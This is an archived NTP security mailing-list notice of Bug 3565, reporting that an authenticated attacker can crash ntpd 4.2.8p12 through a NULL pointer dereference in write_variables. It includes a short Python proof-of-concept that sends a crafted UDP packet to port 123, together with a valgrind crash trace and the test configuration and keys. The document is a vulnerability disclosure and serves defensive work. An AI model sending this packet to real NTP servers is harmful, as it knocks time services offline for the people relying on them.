[ntp:security] [Bug 3565] test

bugzilla-daemon at ntp.org bugzilla-daemon at ntp.org
Tue Jan 15 23:49:51 UTC 2019


http://bugs.ntp.org/show_bug.cgi?id=3565

Harlan Stenn <stenn at ntp.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
           Priority|P5                          |P2
                 CC|                            |magnus at stubman.eu
              Flags|                            |blocking4.2.8+
           Severity|enhancement                 |major

--- Comment #1 from Harlan Stenn <stenn at ntp.org> 2019-01-15 23:49:51 UTC ---
An authenticated attacker can cause ntpd to sigsegv by triggering a NULL
pointer exception.

Embargo offered until 15 April 2019.

Proof of concept:

#!/usr/bin/env python
import sys
import socket

buf = ("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
       "\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
       "\x56\xc8\x07\xd4")

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))

Crash report:

$ sudo valgrind ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
==21159== Memcheck, a memory error detector
==21159== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==21159== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==21159== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
==21159== 
15 Jan 21:17:45 ntpd[21159]: ntpd 4.2.8p12 at 1.3728-o Tue Jan 15 12:39:50 UTC
2019 (1): Starting
15 Jan 21:17:45 ntpd[21159]: Command line: ./ntpd/ntpd -n -c
/home/magnus/resources/ntp.conf
15 Jan 21:17:45 ntpd[21159]: proto: precision = 1.338 usec (-19)
15 Jan 21:17:45 ntpd[21159]: switching logging to file /tmp/ntp.log
15 Jan 21:17:46 ntpd[21159]: Listen and drop on 0 v6wildcard [::]:123
15 Jan 21:17:46 ntpd[21159]: Listen and drop on 1 v4wildcard 0.0.0.0:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 2 lo 127.0.0.1:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 3 eth0 192.168.245.230:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 4 lo [::1]:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 5 eth0
[fe80::50:56ff:fe38:d7b8%2]:123
15 Jan 21:17:46 ntpd[21159]: Listening on routing socket on fd #22 for
interface updates
15 Jan 21:17:46 ntpd[21159]: kernel reports TIME_ERROR: 0x41: Clock
Unsynchronized
15 Jan 21:17:46 ntpd[21159]: kernel reports TIME_ERROR: 0x41: Clock
Unsynchronized
==21159== Invalid read of size 1
==21159==    at 0x133E60: write_variables (ntp_control.c:3467)
==21159==    by 0x147539: receive (ntp_proto.c:690)
==21159==    by 0x12C8CD: ntpdmain (ntpd.c:1442)
==21159==    by 0x5FE4B44: (below main) (libc-start.c:287)
==21159==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==21159== 
==21159== 
==21159== Process terminating with default action of signal 11 (SIGSEGV)
==21159==  Access not within mapped region at address 0x0
==21159==    at 0x133E60: write_variables (ntp_control.c:3467)
==21159==    by 0x147539: receive (ntp_proto.c:690)
==21159==    by 0x12C8CD: ntpdmain (ntpd.c:1442)
==21159==    by 0x5FE4B44: (below main) (libc-start.c:287)
==21159==  If you believe this happened as a result of a stack
==21159==  overflow in your program's main thread (unlikely but
==21159==  possible), you can try to increase the size of the
==21159==  main thread stack using the --main-stacksize= flag.
==21159==  The main thread stack size used in this run was 204800.
==21159== 
==21159== HEAP SUMMARY:
==21159==     in use at exit: 120,503 bytes in 2,646 blocks
==21159==   total heap usage: 2,785 allocs, 139 frees, 397,278 bytes allocated
==21159== 
==21159== LEAK SUMMARY:
==21159==    definitely lost: 0 bytes in 0 blocks
==21159==    indirectly lost: 0 bytes in 0 blocks
==21159==      possibly lost: 3,134 bytes in 4 blocks
==21159==    still reachable: 117,369 bytes in 2,642 blocks
==21159==         suppressed: 0 bytes in 0 blocks
==21159== Rerun with --leak-check=full to see details of leaked memory
==21159== 
==21159== For counts of detected and suppressed errors, rerun with: -v
==21159== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)

Configuration:

$ cat ~/resources/ntp.conf 
logfile /tmp/ntp.log
restrict 127.0.0.1
keys /home/magnus/resources/keys
trustedkey 1
controlkey 1
requestkey 1

$ cat /home/magnus/resources/keys 
1 M gurka
2 M agurk

-- 
Configure bugmail: http://bugs.ntp.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are on the CC list for the bug.


More information about the security mailing list